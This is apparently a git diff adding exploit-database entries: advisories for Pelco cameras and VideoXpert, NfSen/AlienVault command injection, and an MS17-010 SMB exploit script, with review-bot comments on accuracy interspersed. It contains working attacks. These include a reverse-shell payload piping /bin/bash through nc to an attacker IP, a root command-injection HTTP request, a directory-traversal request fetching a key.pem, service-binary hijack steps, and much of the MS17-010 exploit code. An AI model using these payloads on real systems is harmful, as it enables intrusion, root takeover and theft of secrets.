+41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Reverse Netcat Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0 41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0 41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - exceve(_/bin/sh_) Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0 41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0 
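Review bot: the path on the `41510` lines (both `-` and `+`) carries the extension `.nsam`, which reads as a transposition of `.nasm` (compare `41509.nasm` on the line directly above and the other Robert L. Taylor entries in this hunk). If the file on disk is really named `41510.nsam`, a rename plus csv update would be cleaner than carrying the typo through another description edit; if only the csv is wrong, fix the extension here so the path resolves.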
@@ -32904,7 +32905,7 @@ id,file,description,date,author,platform,type,port 32455,platforms/php/webapps/32455.pl,"Website Directory - 'index.php' Cross-Site Scripting",2008-10-03,"Ghost Hacker",php,webapps,0 32459,platforms/java/webapps/32459.txt,"VeriSign Kontiki Delivery Management System 5.0 - 'action' Parameter Cross-Site Scripting",2008-10-05,"Mazin Faour",java,webapps,0 32461,platforms/php/webapps/32461.txt,"AmpJuke 0.7.5 - 'index.php' SQL Injection",2008-10-03,S_DLA_S,php,webapps,0 -32462,platforms/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - HTTP POST Request Filter Security Bypass",2008-10-06,WHK,php,webapps,0 +32462,platforms/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - POST Request Filter Security Bypass",2008-10-06,WHK,php,webapps,0 32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b - main.php refer Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b - 'edit.php' File Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 32467,platforms/php/webapps/32467.txt,"Opera Web Browser 8.51 - URI redirection Remote Code Execution",2008-10-08,MATASANOS,php,webapps,0 
@@ -38120,3 +38121,10 @@ id,file,description,date,author,platform,type,port 42284,platforms/hardware/webapps/42284.py,"Humax HG100R 2.0.6 - Backup File Download",2017-06-30,gambler,hardware,webapps,0 42293,platforms/hardware/webapps/42293.txt,"OpenDreamBox 2.0.0 Plugin WebAdmin - Remote Code Execution",2017-07-03,"Jonatas Fil",hardware,webapps,0 42290,platforms/linux/webapps/42290.txt,"BOA Web Server 0.94.14rc21 - Arbitrary File Access",2017-06-20,"Miguel Mendez Z",linux,webapps,0 +42306,platforms/linux/webapps/42306.txt,"NfSen < 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection",2017-07-10,"Paul Taylor",linux,webapps,0 +42307,platforms/hardware/webapps/42307.txt,"Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery / Cross-Site Scripting",2017-07-10,LiquidWorm,hardware,webapps,0 +42308,platforms/hardware/webapps/42308.txt,"Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery (Enable SSH Root Access)",2017-07-10,LiquidWorm,hardware,webapps,0 +42309,platforms/hardware/webapps/42309.txt,"Pelco Sarix/Spectra Cameras - Remote Code Execution",2017-07-10,LiquidWorm,hardware,webapps,0 +42311,platforms/windows/webapps/42311.txt,"Pelco VideoXpert 1.12.105 - Directory Traversal",2017-07-10,LiquidWorm,windows,webapps,0 +42312,platforms/windows/webapps/42312.txt,"Pelco VideoXpert 1.12.105 - Information Disclosure",2017-07-10,LiquidWorm,windows,webapps,0 +42314,platforms/linux/webapps/42314.txt,"NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection",2017-07-11,"Paul Taylor",linux,webapps,0 diff --git a/platforms/hardware/webapps/42307.txt b/platforms/hardware/webapps/42307.txt new file mode 100755 index 000000000..29c7497f8 --- /dev/null +++ b/platforms/hardware/webapps/42307.txt 
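Review bot: the two NfSen rows added here (`+42306` and `+42314`) disagree on the AlienVault version (`OSSIM 5.3.4` vs `OSSIM 4.3.1`) for what the same author and consecutive dates suggest is one command-injection bug, and the 42314 advisory in this patch lists NfSen 1.3.7 itself as affected and says `AlienVault USM/OSSIM < 4.3.1`, so the title `NfSen < 1.3.7 / AlienVault OSSIM 4.3.1` understates the range on one side and overstates it on the other; align both titles with the advisory header (e.g. `NfSen <= 1.3.7 / AlienVault USM/OSSIM < 4.3.1`). Separately, the subject line counts 9 new exploits but this hunk adds seven rows: no rows for `42310.txt` (windows/local) or `42315.py` (windows/remote) appear in the hunks shown, so confirm they land in the local and remote sections of the csv.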
@@ -0,0 +1,168 @@ +Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities + + +Vendor: Schneider Electric SE +Product web page: https://www.pelco.com +Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) + Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) + Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) + Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) + Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0) + +Summary: Pelco offers the broadest selection of IP cameras designed +for security surveillance in a wide variety of commercial and industrial +settings. From our industry-leading fixed and high-speed IP cameras to +panoramic, thermal imaging, explosionproof and more, we offer a camera +for any environment, any lighting condition and any application. +When nothing but the best will do. Sarix™ Enhanced Range cameras +provide the most robust feature-set for your mission-critical applications. +With SureVision™ 3.0, Sarix Enhanced delivers the best possible image +in difficult lighting conditions such as a combination of bright areas, +shaded areas, and intense light. Designed with superior reliability, +fault tolerance, and processing speed, these rugged fixed IP cameras +ensure you always get the video that you need. + +Desc: Pelco cameras suffer from multiple dom-based, stored and reflected +XSS vulnerabilities when input passed via several parameters to several +scripts is not properly sanitized before being returned to the user. +This can be exploited to execute arbitrary HTML and script code in a +user's browser session in context of an affected site. 
+ +Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown + MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) + Lighttpd/1.4.28 + PHP/5.3.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5415 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php + + +07.04.2017 + +-- + + +CSRF/XSS on username parameter: +------------------------------- + + + + +
+ + + + + + + + + + + +
+ + + + +CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter: +------------------------------------------------------------------------------------------------------- + + + + +
+ + + + + + + + + +
+ + + + +CSRF/XSS on version parameter: +------------------------------ + + + + +
+ + + + + +
+ + + + +CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter: +---------------------------------------------------------------------------- + + + + +
+ + + + + + + + + + + + +
+ + + + +XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter: +-------------------------------------------------------------------------------- + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + +
+ + diff --git a/platforms/hardware/webapps/42308.txt b/platforms/hardware/webapps/42308.txt new file mode 100755 index 000000000..154d09978 --- /dev/null +++ b/platforms/hardware/webapps/42308.txt 
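Review bot: every PoC section in this file, from `CSRF/XSS on username parameter:` through `XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:`, contains nothing but blank `+` lines, so the advisory as committed names parameters without the script or request that carries each one, and the Desc only says "several parameters to several scripts". For each heading add the target endpoint and whether the vector is DOM-based, stored or reflected, since that is what a defender needs to reproduce the finding or write a log or WAF check; also reconcile the title ("Multiple XSS Vulnerabilities") with the section labels ("CSRF/XSS"), which imply the stored cases are reachable cross-site. No vendor fix or response is recorded, although the listed date (07.04.2017) is three months before publication.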
@@ -0,0 +1,82 @@ +Schneider Electric Pelco Sarix/Spectra Cameras CSRF Enable SSH Root Access + + +Vendor: Schneider Electric SE +Product web page: https://www.pelco.com +Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) + Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) + Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) + Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) + Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0) + +Summary: Pelco offers the broadest selection of IP cameras designed +for security surveillance in a wide variety of commercial and industrial +settings. From our industry-leading fixed and high-speed IP cameras to +panoramic, thermal imaging, explosionproof and more, we offer a camera +for any environment, any lighting condition and any application. +When nothing but the best will do. Sarix™ Enhanced Range cameras +provide the most robust feature-set for your mission-critical applications. +With SureVision™ 3.0, Sarix Enhanced delivers the best possible image +in difficult lighting conditions such as a combination of bright areas, +shaded areas, and intense light. Designed with superior reliability, +fault tolerance, and processing speed, these rugged fixed IP cameras +ensure you always get the video that you need. + +Desc: The application interface allows users to perform certain actions +via HTTP requests without performing any validity checks to verify the +requests. This can be exploited to perform certain actions with administrative +privileges if a logged-in user visits a malicious web site. 
+ +Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown + MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) + Lighttpd/1.4.28 + PHP/5.3.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5416 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5416.php + + +07.04.2017 + +-- + + +CSRF enable ssh root access: +---------------------------- + + + + +
+ + + + +
+ + + + + +CSRF add admin: +--------------- + + + + +
+ + + + + + + +
+ + diff --git a/platforms/hardware/webapps/42309.txt b/platforms/hardware/webapps/42309.txt new file mode 100755 index 000000000..022be59c2 --- /dev/null +++ b/platforms/hardware/webapps/42309.txt 
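Review bot: both PoC sections (`CSRF enable ssh root access:` and `CSRF add admin:`) are empty in this hunk, and the Desc paragraph is generic CSRF boilerplate, so nothing in the file identifies the endpoint or form fields that toggle SSH root access or create an administrator. Add the request (method, path, parameters) for each action and state whether the interface issues any anti-CSRF token or checks Origin/Referer, since "without performing any validity checks" is the entire finding; noting that the session rides on plain cookies (`PHPSESSID`, `authos-token`, as seen in the 42309 PoC request in this same patch) would make the "logged-in user visits a malicious web site" precondition concrete.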
@@ -0,0 +1,191 @@ +Schneider Electric Pelco Sarix/Spectra Cameras Root Remote Code Execution + + +Vendor: Schneider Electric SE +Product web page: https://www.pelco.com +Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) + Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) + Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) + Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) + Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0) + +Summary: Pelco offers the broadest selection of IP cameras designed +for security surveillance in a wide variety of commercial and industrial +settings. From our industry-leading fixed and high-speed IP cameras to +panoramic, thermal imaging, explosionproof and more, we offer a camera +for any environment, any lighting condition and any application. +When nothing but the best will do. Sarix™ Enhanced Range cameras +provide the most robust feature-set for your mission-critical applications. +With SureVision™ 3.0, Sarix Enhanced delivers the best possible image +in difficult lighting conditions such as a combination of bright areas, +shaded areas, and intense light. Designed with superior reliability, +fault tolerance, and processing speed, these rugged fixed IP cameras +ensure you always get the video that you need. + +Desc: The affected cameras suffer from authenticated remote code +execution vulnerability. The POST parameter 'enable_leds' located +in the update() function called via the GeneralSetupController.php +script is not properly sanitised before being used in writeLedConfig() +function to enable led state to on or off. A remote attacker can +exploit this issue and execute arbitrary system commands granting +her system access with root privileges using a specially crafted +request and escape sequence to system shell. 
+ + +--------------------------------------------------------------------------- +/var/www/core/setup/controllers/GeneralSetupController.php: +----------------------------------------------------------- + +43: public function update() { +44: $errOccurred = false; +45: $logoreboot = false; +46: +47: // If can update general settings +48: if ($this->_context->_user->hasPermission("{51510980-768b-4b26-a44a-2ae49f308184}")) { +49: +50: $errors = $this->validateInputs("setup", "general.invalid"); +51: +52: // +53: $new_logo_path; +54: if (empty($errors) && (strlen($_FILES["new_logo_path"]["name"]) > 0)) { +55: // The user has provided a file to load in as an image. Verify that the file is ok. +56: $errors = $this->storeBmpFileIfValid($new_logo_path, $width, $height); +57: } else { +58: // In this case, get the width and height from the omons settings +59: $width = intval($this->_conf->get("Video/Overlay", "LogoWidth")); +60: $height = intval($this->_conf->get("Video/Overlay", "LogoHeight")); +61: } +62: // +63: if (empty($errors)) { +64: $device_name = $_POST["device_name"]; +65: +66: $this->_conf->set("Device", "FriendlyName", $device_name); +67: +68: // update smtp server; append port 25 if it's not provided by the user +69: $smtpServer = $_POST["smtp_server"]; +70: +71: if ((! empty($smtpServer)) && preg_match(self::kHostPortRegex, $smtpServer) == 0) { +72: $smtpServer .= ":" . self::kDefaultSmtpPort; +73: } +74: +75: $this->_conf->set("Networking", "SmtpServer", $smtpServer); +76: +77: // +78: $success = $this->writeLedConfig($_POST["enable_leds"]); +79: // +80: } else { +81: $this->_context->setError("phobos", "validation.failure"); +82: $this->_context->setErrorList($errors); +83: +84: $errOccurred = true; +85: } +86: } + +... +... +... 
+ +Bonus hint: When uploading a bmp logo, you can modify the width offset for example and inject persistent code: +-- +-> 12h: 00 01 00 00 ; width (max 0x100, min 0x20) +-- +191: if ($logoOverlay) { +192: if($logoreboot) { +193: $cmd = "/usr/bin/overlayLogo " . $logo_justification . " " . $logo_row . " " . $width . " " . $height . " 0"; +194: exec($cmd); +195: } +196: } else { +197: $cmd = "/usr/bin/overlayLogo 1 1 1 1 1"; +198: exec($cmd); +199: } + +... +... +... + +265: $vparams["enable_leds"] = $this->getLedConfig(); +266: // +267: $vparams["device_name"] = $this->_conf->get("Device", "FriendlyName"); +268: $vparams["TimeFormat"] = $this->_conf->get("Video/Overlay", "TimeFormat"); +269: $vparams["date_formats"] = $this->getDateFormats(); +270: $vparams["selectedDateFormat"] = $this->_conf->get("Video/Overlay", "DateFormat"); +271: +272: ob_start(); +273: passthru("date +\"" . $vparams["TimeFormat"] . "\""); +274: $vparams["current_time"] = trim(ob_get_contents()); +275: ob_end_clean(); + +... +... +... + +630: /** @param $state string "on" or "off" */ +631: protected function writeLedConfig($state) { +632: $encoded = array('type' => 'uint32', +633: 'value' => ($state == 'on' ? 
1 : 0)); +634: +635: $rest = $this->getRestProxy(); +636: $params = array(array('type' => 'uint32', 'value' => 10), $encoded); +637: $response = $rest->GetWithPayload('/internal/msgbus/com.pelco.hardware.led/SetState?', +638: 'application/json', +639: $params); +640: +641: return ($response->GetStatus() == 200); +642: } + +--------------------------------------------------------------------------- + + +Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown + MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) + Lighttpd/1.4.28 + PHP/5.3.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5417 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5417.php + + +07.04.2017 + +-- + + +PoC sleep 17s: + +POST /setup/system/general/update HTTP/1.1 +Host: 192.168.1.1 +Content-Length: x +Cache-Control: max-age=0 +Origin: http://192.168.1.1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Referer: http://192.168.1.1/setup/system/general +Accept-Language: en-US,en;q=0.8,mk;q=0.6 +Cookie: PHPSESSID=p2ooorb7gloavc0et2stj2tnn4; authos-token=07E14CAF; svcts=1495616826 +Connection: close + +device_name=ZSL&enable_leds=%60sleep%2017%60&smtp_server=&ntp_server_from_dhcp=false&ntp_server=time.nist.gov®ion=Universe&zone=Earth&enable_time_overlay=on&enable_name_overlay=off&position=topright&date_format=0 + +=== + +PoC echo: + +POST /setup/system/general/update HTTP/1.1 +Host: 192.168.1.1 + +enable_leds=%60echo%20251%20>test.html%60 + +-- + +GET http://192.168.1.1/test.html HTTP/1.1 + +Response: + +251 
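Review bot: the Desc says `enable_leds` is "not properly sanitised before being used in writeLedConfig()", but the quoted writeLedConfig() (lines 630-642) only maps the value to `1 : 0` inside a JSON payload for a REST call to `/internal/msgbus/com.pelco.hardware.led/SetState`, so the excerpt never shows the parameter reaching a shell; the only shell sinks quoted are `exec($cmd)` for `/usr/bin/overlayLogo` (lines 193-198, fed by `$width`/`$height` from the uploaded BMP, which is what the "bonus hint" describes) and `passthru("date ...")` (line 273, fed by the stored TimeFormat). Either quote the handler behind the SetState message-bus call where the injection actually occurs, or reword the Desc so the root cause is stated accurately. Two smaller points: the PoC request carries `Content-Length: x`, which a server will reject, so give a real length or drop the header; and the csv title should say "Authenticated" to match the Desc, since the PoC sends a `PHPSESSID`/`authos-token` session and `update()` is gated on a permission check at line 48.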
diff --git a/platforms/linux/remote/42306.txt b/platforms/linux/webapps/42306.txt similarity index 100% rename from platforms/linux/remote/42306.txt rename to platforms/linux/webapps/42306.txt diff --git a/platforms/linux/webapps/42314.txt b/platforms/linux/webapps/42314.txt new file mode 100755 index 000000000..50f45dc7f --- /dev/null +++ b/platforms/linux/webapps/42314.txt @@ -0,0 +1,28 @@ +# Exploit Title: NfSen/AlienVault remote root exploit (command injection in customfmt parameter) +# Version: NfSen 1.3.6p1, 1.3.7 and 1.3.7-1~bpo80+1_all. Previous versions are also likely to be affected. +# Version: AlienVault USM/OSSIM < 4.3.1 +# Date: 2017-07-10 +# Vendor Homepage: http://nfsen.sourceforge.net/ +# Vendor Homepage: http://www.alienvault.com/ +# Software Link: https://sourceforge.net/projects/nfsen/files/stable/nfsen-1.3.7/nfsen-1.3.7.tar.gz/download +# Exploit Author: Paul Taylor / Foregenix Ltd +# Website: http://www.foregenix.com/blog +# Tested on: NfSen 1.3.7 +# CVE: CVE-2017-7175, CVE-2017-6972 + +1. Description + +A remote authenticated attacker (or an attacker with a stolen PHP Session ID) can gain complete control over the system by sending a crafted request with shell commands which will be executed as root on a vulnerable system. The injection is covered by CVE-2017-7175, and the commands are executed as root due to CVE-2017-6972. + +2. Proof of Concept + + +For a reverse shell to attacking machine 10.100.1.2, on the NfSen / AlienVault netflow processing web page, enter the following into the "Custom output format:" input box: + +'; nc -ne /bin/bash 10.100.1.2 443 # + +If nc is not installed on the target, then alternative attacks are likely to be possible to leverage the vulnerability. + +3. Solution: + +Update to latest version of NfSen/USM/OSSIM diff --git a/platforms/windows/local/42310.txt b/platforms/windows/local/42310.txt new file mode 100755 index 000000000..297962768 --- /dev/null +++ b/platforms/windows/local/42310.txt 
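Review bot: the header of 42314.txt lists `NfSen 1.3.6p1, 1.3.7 and 1.3.7-1~bpo80+1_all` as affected and the Software Link points at the 1.3.7 tarball, yet section 3 says only "Update to latest version of NfSen/USM/OSSIM"; if 1.3.7 is the latest release, that is not a fix. State the version or commit that closes CVE-2017-7175, and say whether running the nfsen web component as an unprivileged user (root execution is CVE-2017-6972, per section 1) is an acceptable interim mitigation. The `customfmt` parameter named in the title and in this file's first line appears nowhere in the body, which only mentions the "Custom output format:" input box; name the HTTP endpoint and parameter so the injection can be matched in web server logs.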
@@ -0,0 +1,107 @@ +Schneider Electric Pelco VideoXpert Privilege Escalations + + +Vendor: Schneider Electric SE +Product web page: https://www.pelco.com +Affected version: Core Software 1.12.105 + Media Gateway Software 1.12.26 + Exports 1.12 + + +Summary: VideoXpert is a video management solution designed for +scalability, fitting the needs surveillance operations of any size. +VideoXpert Ultimate can also aggregate other VideoXpert systems, +tying multiple video management systems into a single interface. + +Desc: The application is vulnerable to an elevation of privileges +vulnerability which can be used by a simple user that can change +the executable file with a binary of choice. The vulnerability exist +due to the improper permissions, with the 'F' flag (full) for the +'Users' group, for several binary files. The service is installed +by default to start on system boot with LocalSystem privileges. +Attackers can replace the binary with their rootkit, and on reboot +they get SYSTEM privileges. + +VideoXpert services also suffer from an unquoted search path issue +impacting the 'VideoXpert Core' and 'VideoXpert Exports' services +for Windows deployed as part of the VideoXpert Setup bundle. This +could potentially allow an authorized but non-privileged local user +to execute arbitrary code with elevated privileges on the system. A +successful attempt would require the local user to be able to insert +their code in the system root path undetected by the OS or other security +applications where it could potentially be executed during application +startup or reboot. If successful, the local user’s code would execute +with the elevated privileges of the application. 
+ +Tested on: Microsoft Windows 7 Professional SP1 (EN) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5418 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5418.php + + +05.04.2017 + +-- + + +C:\Program Files\Pelco\Core>sc qc "VideoXpert Core" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: VideoXpert Core + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START (DELAYED) + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Pelco\Core\tools\nssm.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : VideoXpert Core + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +C:\>cacls "C:\Program Files\Pelco\Core\tools\nssm.exe" +C:\Program Files\Pelco\Core\tools\nssm.exe NT AUTHORITY\SYSTEM:(ID)F + BUILTIN\Administrators:(ID)F + BUILTIN\Users:(ID)R + + +C:\ProgramData\Pelco\Core\db\bin>cacls * |findstr "Users:(ID)F" +C:\ProgramData\Pelco\Core\db\bin\libeay32.dll BUILTIN\Users:(ID)F +C:\ProgramData\Pelco\Core\db\bin\mongod.exe BUILTIN\Users:(ID)F +C:\ProgramData\Pelco\Core\db\bin\mongos.exe BUILTIN\Users:(ID)F +C:\ProgramData\Pelco\Core\db\bin\nssm.exe BUILTIN\Users:(ID)F +C:\ProgramData\Pelco\Core\db\bin\ssleay32.dll BUILTIN\Users:(ID)F + + +C:\>cacls "C:\ProgramData\Pelco\Exports\bin\nssm.exe" +C:\ProgramData\Pelco\Exports\bin\nssm.exe BUILTIN\Users:(ID)F + NT AUTHORITY\SYSTEM:(ID)F + BUILTIN\Administrators:(ID)F + + +C:\>cacls "C:\ProgramData\Pelco\Gateway\bin\nssm.exe" +C:\ProgramData\Pelco\Gateway\bin\nssm.exe BUILTIN\Users:(ID)F + NT AUTHORITY\SYSTEM:(ID)F + BUILTIN\Administrators:(ID)F + + + +C:\Users\senad>sc qc "VideoXpert Exports" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: VideoXpert Exports + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\ProgramData\Pelco\Exports\bin\nssm.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : VideoXpert Exports + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + 
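Review bot: the evidence in this hunk does not support the claim that 'VideoXpert Core' can be hijacked by replacing its service binary: 'sc qc "VideoXpert Core"' reports BINARY_PATH_NAME C:\Program Files\Pelco\Core\tools\nssm.exe, and the cacls output for that exact file shows BUILTIN\Users:(ID)R, not F. The writable files are under C:\ProgramData\Pelco\Core\db\bin (libeay32.dll, mongod.exe, mongos.exe, nssm.exe, ssleay32.dll) plus the Exports and Gateway nssm.exe, and only 'VideoXpert Exports' is shown starting directly from a Users:(ID)F binary. The Desc should state which service loads which writable file (for example whether the Core nssm.exe launches mongod.exe from db\bin) so the Core impact is traceable from the output. The unquoted-search-path claim for 'VideoXpert Exports' is likewise unsupported: its BINARY_PATH_NAME C:\ProgramData\Pelco\Exports\bin\nssm.exe contains no spaces, so that issue as described applies to the Core path (C:\Program Files\...) only. The advisory also has no fix or mitigation section; suggest adding the vendor status and the interim hardening (reset the ACLs on the listed binaries so Users keep read/execute only, and quote the Core service path).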
diff --git a/platforms/windows/remote/42315.py b/platforms/windows/remote/42315.py new file mode 100755 index 000000000..efda10714 --- /dev/null +++ b/platforms/windows/remote/42315.py 
@@ -0,0 +1,538 @@ +#!/usr/bin/python +from impacket import smb, smbconnection +from mysmb import MYSMB +from struct import pack, unpack, unpack_from +import sys +import socket +import time + +''' +MS17-010 exploit for Windows 7+ by sleepya + +Note: +- The exploit should never crash a target (chance should be nearly 0%) +- The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed + +Tested on: +- Windows 2016 x64 +- Windows 2012 R2 x64 +- Windows 8.1 x64 +- Windows 2008 R2 SP1 x64 +- Windows 7 SP1 x64 +- Windows 8.1 x86 +- Windows 7 SP1 x86 +''' + +USERNAME = '' +PASSWORD = '' + +''' +Reversed from: SrvAllocateSecurityContext() and SrvImpersonateSecurityContext() +win7 x64 +struct SrvSecContext { + DWORD xx1; // second WORD is size + DWORD refCnt; + PACCESS_TOKEN Token; // 0x08 + DWORD xx2; + BOOLEAN CopyOnOpen; // 0x14 + BOOLEAN EffectiveOnly; + WORD xx3; + DWORD ImpersonationLevel; // 0x18 + DWORD xx4; + BOOLEAN UsePsImpersonateClient; // 0x20 +} +win2012 x64 +struct SrvSecContext { + DWORD xx1; // second WORD is size + DWORD refCnt; + QWORD xx2; + QWORD xx3; + PACCESS_TOKEN Token; // 0x18 + DWORD xx4; + BOOLEAN CopyOnOpen; // 0x24 + BOOLEAN EffectiveOnly; + WORD xx3; + DWORD ImpersonationLevel; // 0x28 + DWORD xx4; + BOOLEAN UsePsImpersonateClient; // 0x30 +} + +SrvImpersonateSecurityContext() is used in Windows 7 and later before doing any operation as logged on user. +It called PsImperonateClient() if SrvSecContext.UsePsImpersonateClient is true. +From https://msdn.microsoft.com/en-us/library/windows/hardware/ff551907(v=vs.85).aspx, if Token is NULL, +PsImperonateClient() ends the impersonation. Even there is no impersonation, the PsImperonateClient() returns +STATUS_SUCCESS when Token is NULL. +If we can overwrite Token to NULL and UsePsImpersonateClient to true, a running thread will use primary token (SYSTEM) +to do all SMB operations. +Note: fake Token might be possible, but NULL token is much easier. 
+''' +WIN7_INFO = { + 'SESSION_SECCTX_OFFSET': 0xa0, + 'SESSION_ISNULL_OFFSET': 0xba, + 'FAKE_SECCTX': pack(' ".format(sys.argv[0])) + sys.exit(1) + +target = sys.argv[1] +pipe_name = sys.argv[2] + +exploit(target, pipe_name) +print('Done') \ No newline at end of file diff --git a/platforms/windows/webapps/42311.txt b/platforms/windows/webapps/42311.txt new file mode 100755 index 000000000..0ad3e35a3 --- /dev/null +++ b/platforms/windows/webapps/42311.txt 
@@ -0,0 +1,149 @@ +Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal + + +Vendor: Schneider Electric SE +Product web page: https://www.pelco.com +Affected version: 2.0.41 + 1.14.7 + 1.12.105 + +Summary: VideoXpert is a video management solution designed for +scalability, fitting the needs surveillance operations of any size. +VideoXpert Ultimate can also aggregate other VideoXpert systems, +tying multiple video management systems into a single interface. + +Desc: Pelco VideoXpert suffers from a directory traversal vulnerability. +Exploiting this issue will allow an unauthenticated attacker to +view arbitrary files within the context of the web server. + + +Tested on: Microsoft Windows 7 Professional SP1 (EN) + Jetty(9.2.6.v20141205) + MongoDB/3.2.10 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5419 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php + + +05.04.2017 + +-- + + +PoC: +---- + +GET /portal//..\\\..\\\..\\\..\\\windows\win.ini HTTP/1.1 +Host: 172.19.0.198 +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) +Connection: close + + +HTTP/1.1 200 OK +Date: Wed, 05 Apr 2017 13:27:39 GMT +Last-Modified: Tue, 14 Jul 2009 05:09:22 GMT +Cache-Control: public, max-age=86400 +Content-Type: text/html; charset=UTF-8 +Vary: Accept-Encoding +ETag: 1247548162000 +Content-Length: 403 +Connection: close + +; for 16-bit app support +[fonts] +[extensions] +[mci extensions] +[files] +[Mail] +MAPI=1 +[MCI Extensions.BAK] +3g2=MPEGVideo +3gp=MPEGVideo +3gp2=MPEGVideo +3gpp=MPEGVideo +aac=MPEGVideo +adt=MPEGVideo +adts=MPEGVideo +m2t=MPEGVideo +m2ts=MPEGVideo +m2v=MPEGVideo +m4a=MPEGVideo +m4v=MPEGVideo +mod=MPEGVideo +mov=MPEGVideo +mp4=MPEGVideo +mp4v=MPEGVideo +mts=MPEGVideo +ts=MPEGVideo +tts=MPEGVideo + + +------ + + +GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\db\security\key.pem 
